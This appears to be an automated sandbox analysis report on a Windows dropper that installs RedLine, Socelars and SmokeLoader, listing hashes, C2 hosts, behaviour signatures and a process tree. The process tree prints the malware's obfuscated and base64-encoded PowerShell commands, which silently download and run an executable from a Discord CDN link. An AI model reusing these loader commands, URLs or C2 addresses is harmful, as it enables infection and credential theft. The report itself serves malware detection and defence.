Resubmissions

10-11-2021 14:52

211110-r84p8aedej 10

09-11-2021 13:19

211109-qkrv3sfcg4 10

Analysis

  • max time kernel
    167s
  • max time network
    185s
  • platform
    windows7_x64
  • resource
    win7-en-20211104
  • submitted
    09-11-2021 13:19

General

  • Target

    4a4a606501eea3b8b9e128412455243ca20de0efe374c9c47ff3b5caac457375.exe

  • Size

    5.0MB

  • MD5

    2b0ce83a2a1065ef402b7a50f45892fd

  • SHA1

    d66a565247f9df9ac0bdb3725eee121e98d8914d

  • SHA256

    4a4a606501eea3b8b9e128412455243ca20de0efe374c9c47ff3b5caac457375

  • SHA512

    42d19f0130d34a3b37e78b6f1ba9c3c7e07d99e0a76dc005be976c51c2a363e64d475b9caa6805d3e8c1da2a4d32020f307eaae68b41d8c815ae1da8ec0db2ca

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://cdn.discordapp.com/attachments/523238636561629190/894846072097218580/ghielufuzymmuibugkhmviaajvfwio.exe

Extracted

Family

socelars

C2

http://www.iyiqian.com/

http://www.hbgents.top/

http://www.rsnzhy.com/

http://www.znsjis.top/

Extracted

Family

redline

Botnet

05.10

C2

80.92.205.116:59599

Extracted

Family

smokeloader

Version

2020

C2

http://gmpeople.com/upload/

http://mile48.com/upload/

http://lecanardstsornin.com/upload/

http://m3600.com/upload/

http://camasirx.com/upload/

rc4.i32
rc4.i32

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 2 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 5 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 12 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 50 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 11 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 35 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 16 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 34 IoCs
  • Suspicious use of FindShellTrayWindow 5 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\services.exe
    C:\Windows\system32\services.exe
    1⤵
      PID:464
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k netsvcs
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Drops file in Windows directory
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:880
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k SystemNetworkService
        2⤵
        • Drops file in System32 directory
        • Checks processor information in registry
        • Modifies data under HKEY_USERS
        • Modifies registry class
        PID:1976
    • C:\Users\Admin\AppData\Local\Temp\4a4a606501eea3b8b9e128412455243ca20de0efe374c9c47ff3b5caac457375.exe
      "C:\Users\Admin\AppData\Local\Temp\4a4a606501eea3b8b9e128412455243ca20de0efe374c9c47ff3b5caac457375.exe"
      1⤵
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1516
      • C:\Users\Admin\AppData\Local\Temp\Graphics.exe
        "C:\Users\Admin\AppData\Local\Temp\Graphics.exe"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Checks whether UAC is enabled
        • Suspicious use of WriteProcessMemory
        PID:820
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Graphicss.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Graphicss.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1700
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "powershell.exe" [StriNG]::JOiN('', ( '20<22>24T28>73T45T54O2dr69T74O65O6dr20r20T27<56<61O72>49T41>42r6c~45j3ar6f<66O53j27O20O27~27>20~29j20~22%2b>5b>53%54O72%49j6er67j5d>28<20<27r32T34O47O37T35r2dj37O32r7er36~63<57<36r34>59O32O30%47T33~64O2d<32%30%7eO32%37>2dr36~38%7ej37%34>3b%37r34<57%37%30%2dO37T33O6fT33>61<3b<32T66T47T32j66>47O36j33O59O36j34>7e<36<65r48<32~65j57~36<34>7e<36r39O48~37<33O47T36%33r48~36j66r7ej37r32~48>36r34~47>36r31O3b~37T30j48T37<30O48>32>65T48O36%33j48j36<66T47<36%64O2d%32j66~3br36T31j59<37%34j47~37<34O59O36~31<3b~36r33T48~36~38>6fj36>64<57~36%35r3bO36>65<48O37j34j59j37%33r7ej32O66T57%33%35T47T33~32%7er33r33<2dT33O32T6f<33<33r3b<33%38O59O33j36~59O33~33>3bT33>36O6f>33%35r57<33T36%7ej33j31j57~33~36j57%33T32~47O33O39>47~33%31r57<33~39T7e<33<30j3b<32%66r7e>33j38T6fj33j39<48O33~34r3br33T38<57T33T34<57j33~36~6fr33O30T7e<33~37r48O33<32%59~33r30O2dT33T39>47O33>37T48r33O32O2dr33<31j48r33%38j47<33%35%7e%33O38O48>33T30<3br32j66T57r36O37r3b~36O38j57>36T39j48T36<35j57<36T63~2d>37~35T59O36>36%2dO37~35r2dT37<61<3br37>39j48O36r64O6f%36%64~48T37T35<3br36O39>47>36O32>6f%37r35<7e>36%37j57O36O62%47O36T38O7e<36~64~2dj37r36>59j36j39T48O36>31O59%36O31T59r36O61O2d<37r36>3bj36<36~6f~37T37r6fr36%39%59~36r66~6f>32r65~47%36T35r3b<37r38j6fT36>35O7e>32j37j6fO33%62>59%32r34%2dO37%30>59O36>31O48j37T34O7ej36>38r6fr32<30<7e>33j64r57j32O30r6f>32%34j3b%36%35<2d>36%65T6fO37<36j3bT33r61~3b>35j34%48r34>35<59<34O64%2dj35j30>59%32~62>3b%32%32r59<36O38T2dr36%62~6f~36O36~2dO36O64j57%37~38r6f~36>37%59r36T36<48r36<34>3bj36j32r59T36~63O47j36r62>2dj36r34O47r36r33~59<36<37r3bj36<39~7e<37T38T48T36%62O57r36O36T47r36j62~59O37<33>2d<36O61~3bT36r63r2dr36j37T3b%36O64T7e~36O36j57T36>62O7er36>66<57~36T36j57r36j37j2dj37>35<7e<32j65%2dj36>35>7er37>38%59>36j35T47j32>32>47<33r62r57j32j34r7e~37%33>59O36<33r57~37r32O48j36r39O6f>37<30>2d~37r34O57O37T32j3bj37>35r2dj36O65>57r32~30%2dr33j64~57~32~30j7eO32>32>59%37r30T2dj36T66j48T37j37>6fO36<35<57<37j32r6fr37j33T2dr36>38<48>36T35~7eO36<63<59<36<63~7er32%65<3bT36<35T3b~37T38~3br36j35r3b<32j30~57~32<64T2d%36%33T3bO36>66~7e>36<64O59O36T64T59%36j31~47>36j65>48>36~34O7eT32T30T57O35T30<2dT36%66<3bj37j37>48<36O35~48T37>32%47%35>33~6f~36r38>57T36%35T48<36r63~2d>36j63~6fj32<30<3bT32%64j47<34j35T2dj37~38>7er36~35<6f>36j33%59T37O35<57T37j34j3b<36O39>2d>36T66T3b%36O65j3bO35<30~47~36r66j2d>36%63r59~36%39r2d<36T33>2dj37T39~59~32O30O57<36r32<48O37r39j47~37~30>6f>36T31<6fO37r33~3bj37<33T2d~32>30O48j32r64>48j36~65%48%36r66<3bO37>30<2dr37r32>48%36r66O2dT36>36O2d<36>39>59T36j63<3b>36<35r3bT32<30O47>32>64>3bj37<37>47>36%39<48j36~65>2d<36%34r6fj36~66r7er37>37O57r37~33T57O37r34<6f~37<39~3b>36~63j48<36>35%57<32>30>48r36T38O7eO36j39<7e<36r34j57T36<34O59O36j35T7e>36<65%59%32O30>47<32j64r3br36r33T6fj36O66~7e~36%64j59T36%64<48%36>31r3br36j65j3b~36>34j7eO32~30~48>35<33<47O37<34>47~36%31%2dj37j32>2dr37%34T7ej32r64~6fO34>32%3bO36%39T48~37j34T48O37>33%3b%35<34>48T37O32>48<36<31T2d~36T65r48j37>33T7e~36r36r7er36>35j3bj37O32<7e%32T30<48O32%64j47j35>33j6f>36r66<57>37O35T6f%37>32O57r36O33T3br36r35O57r32T30j59<32j34O47T37>35%48>37>32~47<36~63%7e~36r34O3br32~30~6fO32j64>6fr34r34<3b%36j35T47%37%33>47<37r34r3bj36O39~47%36j65~3b%36<31j47T37T34%48O36j39r3bj36>66O6f>36O65O2d>32%30>3bT32%34~59<37T30~7e~36<31~47<37~34j59%36>38>7e~33r62%59<32~32<47O33~62<3bO32~34~2d<36%32j7eT36~31%57%37T33>7eT36O35O7ej33j36~2d>33>34j2d>32~30O48<33j64>3b%32T30j59>35<62~2d<34O33T3b>36%66%2d%36%65O7ej37O36r57T36T35O48O37%32j7eO37r34~47r35O64j57r33j61r3b>33O61r2d<35r34r7eO36~66T6fO34r32<47%36O31>7e%37T33<47~36O35r2dO33j36O6f~33r34T7er35<33<7e<37O34j3bT37<32~48r36j39O2dr36>65%7e>36T37<2d<32<38j59%35<62O57r35<33T2d>37r39%57~37T33<57%37T34>3b~36T35r48>36r64O57>32r65O2dj35r34O59~36T35r59r37<38r47>37j34r7eO32O65%47<34O35<7er36%65<3bT36r33<7er36j66>59r36~34>6f%36%39j6fO36%65>6f<36>37r2d~35~64j6f>33T61j3br33j61T7e>35j35T6fT36T65<2dT36<39<6f%36<33~7e<36T66~6f>36T34O6f>36O35T2dr32j65O3b~34j37T6fj36%35%48%37T34<57j34~32%6fr37<39T3bO37j34T48>36<35~6f%37T33j2d>32%38O3bj32r34<57O37<33~59~36r33~47~37<32r57%36j39r59<37%30~47~37%34~3b<37j32>47j37r35O48O36T65O2dT32%39<7eT32<39O7e%33j62O47%37%37<48j36%38<7e<36O39T47%36>63~48O36T35~47O32%30>48%32O38<6f%32>31~6fO35r62<47T35<33O3br37%39%48<37O33~7er37O34O2dO36<35<59j36<64~47T32O65<6fj34T39T48r34r66r6f<32%65O2d~34%36r2dj36%39>47T36O63T59j36j35<2d<35~64<6fO33~61r3b>33>61>47~34j35O48>37O38r3b~36O39%6fr37O33~47j37>34>57r37%33T2d>32~38>7e~32r34~6f>37~30%57O36j31%47O37j34%59T36<38~57>32%39~59O32O39<47r37%62O57r32<30T47j34~39%48~34<35%3bj35~38%59j32O30O48O32%32r3b>37>30>3br36%66<47O37<37T7ej36%35r57<37O32j59O37j33~2d%36~38>59<36~35%3b%36~63%48~36T63O48<32r30r59%32j64r2d%34j35%3b~32>30>3b~32<34%3b<36j32<3b<36r31%3b<37<33~48O36r35~3b>33~36%6fO33%34~59%32%32j57<33T62T3bT32>30r7e%36~32T47T37%32O3bj36%35>6fO36~31~6fj36r62~7ej33>62~3bj32j30<47j37T64>2dT32j30%6f<35>33<3bT37%34~47T36r31<6f<37O32T57~37T34j6fT32%64j3b<35T30r57~37O32%59T36>66O48T36T33T6f~36O35>47T37~33%47~37<33<2d~32O38>47j32r34O6fj36T35j48r36~65r3br37<36T59%33>61j48<35~34~59>34%35j48T34O64%57r35>30>48<32%62<57T32T37<3bO36%38O6fj36j62O7er36T36T48%36<64~47>37T38O7ej36T37j48>36~36r48<36j34>7e~36<32<3br36~63<3b~36~62~47<36T34<2dr36O33T7eT36T37T6f~36~39<48T37r38r57T36<62j59%36%36T7ej36T62O2d>37O33<2dT36>61<48~36O63O59j36O37%59T36T64j7e<36r36>3bT36T62%2d>36r66~48r36r36~3b<36j37r6fr37O35O48O32j65r7e>36O35r7eO37r38r3br36T35j48%32~37>59T32>39%3b~33~62>27O20~2dT53~70r6cO69%74>20O27<57T27>20~2dO73r70j4cj69<54O20O27~6fT27%2dr53~50r6cO49j54r27%48<27>2d~53T50r4c~49>54%20r27j2dT27<2dr53~50~4c~69O54~27<7ej27~2dr53>70%4cT49r54r20r27O59~27~20~2d>73O70T4cT49>54<27<47O27<20<2d%53>50O4cr69~54T27%3b<27<7c%46j6fT72%45>41%43%68>7b%20r28%20~5bT63%6fT6e~76>65>52<74%5d<3aj3a%54>4fO69<6e>74%31j36j28~20%28<20j24<5fj2e>74r6fT53>54<72>69<4e<67<28r29<20~29O20j2cj20O31O36>20%29%2d>41j73O20r5bj43T48T61<52r5d<29~20<7dT20r29j20>2b%22~24~28O20~73%76j20<27>6fT66j53%27<20r20~27r20r27T29T22T20O7cT69~6e~76r6fr4br45r2dj45O58%50>52%45%53<73~49<6f<4e' -Split'<'-spLIT'j'-SpliT '~'-Split'O'-SpLIT 'r' -SPlIT'>'-SpLIT 'T'-SpLIt '%'|foReACH{( [CHaR] ([CoNveRt]::tOINT16(( $_.TosTRiNG() ) ,16 ))) } ))|& ( $VErBOSEPrEfErence.TosTRinG()[1,3]+'X'-JoiN'')
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1836
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -E cABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBjAG8AbQBtAGEAbgBkACAAUABvAHcAZQByAFMAaABlAGwAbAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABiAHkAcABhAHMAcwAgAC0AbgBvAHAAcgBvAGYAaQBsAGUAIAAtAHcAaQBuAGQAbwB3AHMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAALQBjAG8AbQBtAGEAbgBkACAAUwB0AGEAcgB0AC0AQgBpAHQAcwBUAHIAYQBuAHMAZgBlAHIAIAAtAFMAbwB1AHIAYwBlACAAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8ANQAyADMAMgAzADgANgAzADYANQA2ADEANgAyADkAMQA5ADAALwA4ADkANAA4ADQANgAwADcAMgAwADkANwAyADEAOAA1ADgAMAAvAGcAaABpAGUAbAB1AGYAdQB6AHkAbQBtAHUAaQBiAHUAZwBrAGgAbQB2AGkAYQBhAGoAdgBmAHcAaQBvAC4AZQB4AGUAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAGgAawBmAG0AeABnAGYAZABiAGwAawBkAGMAZwBpAHgAawBmAGsAcwBqAGwAZwBtAGYAawBvAGYAZwB1AC4AZQB4AGUAOwA=
              5⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:2312
              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command PowerShell -ExecutionPolicy bypass -noprofile -windowstyle hidden -command Start-BitsTransfer -Source https://cdn.discordapp.com/attachments/523238636561629190/894846072097218580/ghielufuzymmuibugkhmviaajvfwio.exe -Destination C:\Users\Admin\AppData\Local\Temphkfmxgfdblkdcgixkfksjlgmfkofgu.exe
                6⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:2572
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -noprofile -windowstyle hidden -command Start-BitsTransfer -Source https://cdn.discordapp.com/attachments/523238636561629190/894846072097218580/ghielufuzymmuibugkhmviaajvfwio.exe -Destination C:\Users\Admin\AppData\Local\Temphkfmxgfdblkdcgixkfksjlgmfkofgu.exe
                  7⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2728
      • C:\Users\Admin\AppData\Local\Temp\FoxSBrowser.exe
        "C:\Users\Admin\AppData\Local\Temp\FoxSBrowser.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:1884
      • C:\Users\Admin\AppData\Local\Temp\Process.exe
        "C:\Users\Admin\AppData\Local\Temp\Process.exe"
        2⤵
        • Executes dropped EXE
        PID:1404
      • C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
        "C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:1492
      • C:\Users\Admin\AppData\Local\Temp\Install.exe
        "C:\Users\Admin\AppData\Local\Temp\Install.exe"
        2⤵
        • Executes dropped EXE
        PID:992
      • C:\Users\Admin\AppData\Local\Temp\Folder.exe
        "C:\Users\Admin\AppData\Local\Temp\Folder.exe"
        2⤵
        • Executes dropped EXE
        PID:1952
      • C:\Users\Admin\AppData\Local\Temp\Files.exe
        "C:\Users\Admin\AppData\Local\Temp\Files.exe"
        2⤵
        • Executes dropped EXE
        PID:1736
      • C:\Users\Admin\AppData\Local\Temp\File.exe
        "C:\Users\Admin\AppData\Local\Temp\File.exe"
        2⤵
        • Executes dropped EXE
        • Checks computer location settings
        • Loads dropped DLL
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:1040
        • C:\Users\Admin\Pictures\Adobe Films\MwQRXOmgQ5eY9M3tTDamT97_.exe
          "C:\Users\Admin\Pictures\Adobe Films\MwQRXOmgQ5eY9M3tTDamT97_.exe"
          3⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          PID:824
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1040 -s 1108
          3⤵
          • Loads dropped DLL
          • Program crash
          • Suspicious behavior: GetForegroundWindowSpam
          • Suspicious use of AdjustPrivilegeToken
          PID:2924
      • C:\Users\Admin\AppData\Local\Temp\Details.exe
        "C:\Users\Admin\AppData\Local\Temp\Details.exe"
        2⤵
        • Executes dropped EXE
        PID:1768
      • C:\Users\Admin\AppData\Local\Temp\pub2.exe
        "C:\Users\Admin\AppData\Local\Temp\pub2.exe"
        2⤵
        • Executes dropped EXE
        • Checks SCSI registry key(s)
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: MapViewOfSection
        PID:1656
    • C:\Windows\SysWOW64\rundll32.exe
      rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
      1⤵
      • Loads dropped DLL
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:968
    • C:\Windows\system32\rUNdlL32.eXe
      rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
      1⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1052
    • C:\Program Files\Internet Explorer\iexplore.exe
      "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
      1⤵
      • Modifies Internet Explorer settings
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SetWindowsHookEx
      PID:1760
      • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
        "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1760 CREDAT:275457 /prefetch:2
        2⤵
        • Modifies Internet Explorer settings
        • Suspicious use of SetWindowsHookEx
        PID:2536

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/880-167-0x0000000001300000-0x0000000001372000-memory.dmp

      Filesize

      456KB

    • memory/880-166-0x00000000007B0000-0x00000000007FD000-memory.dmp

      Filesize

      308KB

    • memory/968-163-0x0000000001D60000-0x0000000001E61000-memory.dmp

      Filesize

      1.0MB

    • memory/968-165-0x0000000001E70000-0x0000000001ECD000-memory.dmp

      Filesize

      372KB

    • memory/1040-177-0x0000000003BC0000-0x0000000003D0C000-memory.dmp

      Filesize

      1.3MB

    • memory/1220-164-0x0000000003A40000-0x0000000003A55000-memory.dmp

      Filesize

      84KB

    • memory/1404-138-0x00000000023F0000-0x000000000240D000-memory.dmp

      Filesize

      116KB

    • memory/1404-155-0x0000000004DB4000-0x0000000004DB6000-memory.dmp

      Filesize

      8KB

    • memory/1404-92-0x00000000009D9000-0x00000000009FC000-memory.dmp

      Filesize

      140KB

    • memory/1404-132-0x0000000000220000-0x0000000000250000-memory.dmp

      Filesize

      192KB

    • memory/1404-139-0x0000000004DB1000-0x0000000004DB2000-memory.dmp

      Filesize

      4KB

    • memory/1404-144-0x0000000004DB3000-0x0000000004DB4000-memory.dmp

      Filesize

      4KB

    • memory/1404-134-0x0000000000400000-0x000000000088B000-memory.dmp

      Filesize

      4.5MB

    • memory/1404-97-0x0000000000BC0000-0x0000000000BDF000-memory.dmp

      Filesize

      124KB

    • memory/1404-143-0x0000000004DB2000-0x0000000004DB3000-memory.dmp

      Filesize

      4KB

    • memory/1492-170-0x0000000003170000-0x0000000003180000-memory.dmp

      Filesize

      64KB

    • memory/1492-95-0x0000000000020000-0x0000000000023000-memory.dmp

      Filesize

      12KB

    • memory/1516-55-0x0000000074E51000-0x0000000074E53000-memory.dmp

      Filesize

      8KB

    • memory/1656-146-0x0000000000230000-0x0000000000239000-memory.dmp

      Filesize

      36KB

    • memory/1656-123-0x000000000177C000-0x000000000178C000-memory.dmp

      Filesize

      64KB

    • memory/1656-147-0x0000000000400000-0x00000000016C8000-memory.dmp

      Filesize

      18.8MB

    • memory/1700-77-0x00000000009A0000-0x00000000009A1000-memory.dmp

      Filesize

      4KB

    • memory/1700-140-0x0000000004AB0000-0x0000000004AB1000-memory.dmp

      Filesize

      4KB

    • memory/1760-181-0x000007FEFB931000-0x000007FEFB933000-memory.dmp

      Filesize

      8KB

    • memory/1768-142-0x000000000030C000-0x0000000000328000-memory.dmp

      Filesize

      112KB

    • memory/1768-150-0x00000000001B0000-0x00000000001E0000-memory.dmp

      Filesize

      192KB

    • memory/1768-151-0x0000000000400000-0x00000000016D9000-memory.dmp

      Filesize

      18.8MB

    • memory/1836-182-0x0000000001C90000-0x0000000001C91000-memory.dmp

      Filesize

      4KB

    • memory/1836-183-0x0000000001C91000-0x0000000001C92000-memory.dmp

      Filesize

      4KB

    • memory/1836-185-0x0000000001C92000-0x0000000001C94000-memory.dmp

      Filesize

      8KB

    • memory/1884-79-0x0000000000D80000-0x0000000000D81000-memory.dmp

      Filesize

      4KB

    • memory/1884-169-0x000000001AE10000-0x000000001AE12000-memory.dmp

      Filesize

      8KB

    • memory/1884-148-0x0000000000250000-0x0000000000251000-memory.dmp

      Filesize

      4KB

    • memory/1976-161-0x00000000000E0000-0x000000000012D000-memory.dmp

      Filesize

      308KB

    • memory/1976-203-0x00000000004E0000-0x00000000004FB000-memory.dmp

      Filesize

      108KB

    • memory/1976-168-0x0000000000450000-0x00000000004C2000-memory.dmp

      Filesize

      456KB

    • memory/1976-204-0x0000000003160000-0x0000000003265000-memory.dmp

      Filesize

      1.0MB

    • memory/2312-188-0x00000000024E0000-0x000000000312A000-memory.dmp

      Filesize

      12.3MB

    • memory/2312-192-0x00000000024E0000-0x000000000312A000-memory.dmp

      Filesize

      12.3MB

    • memory/2312-190-0x00000000024E0000-0x000000000312A000-memory.dmp

      Filesize

      12.3MB

    • memory/2572-195-0x00000000023C0000-0x00000000023C1000-memory.dmp

      Filesize

      4KB

    • memory/2572-199-0x00000000023C1000-0x00000000023C2000-memory.dmp

      Filesize

      4KB

    • memory/2572-200-0x00000000023C2000-0x00000000023C4000-memory.dmp

      Filesize

      8KB

    • memory/2728-198-0x0000000002490000-0x00000000030DA000-memory.dmp

      Filesize

      12.3MB

    • memory/2728-201-0x0000000002490000-0x00000000030DA000-memory.dmp

      Filesize

      12.3MB

    • memory/2728-202-0x0000000002490000-0x00000000030DA000-memory.dmp

      Filesize

      12.3MB

    • memory/2924-205-0x00000000005F0000-0x00000000005F1000-memory.dmp

      Filesize

      4KB